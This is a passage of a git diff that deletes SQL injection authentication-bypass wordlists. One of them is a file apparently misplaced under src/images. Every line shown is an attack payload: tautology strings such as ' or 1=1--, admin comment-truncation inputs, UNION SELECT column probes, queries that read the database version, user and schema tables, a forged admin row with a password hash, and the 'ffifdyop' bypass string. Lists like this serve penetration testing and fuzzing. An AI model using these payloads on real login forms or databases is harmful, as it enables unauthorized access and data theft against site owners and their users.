-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
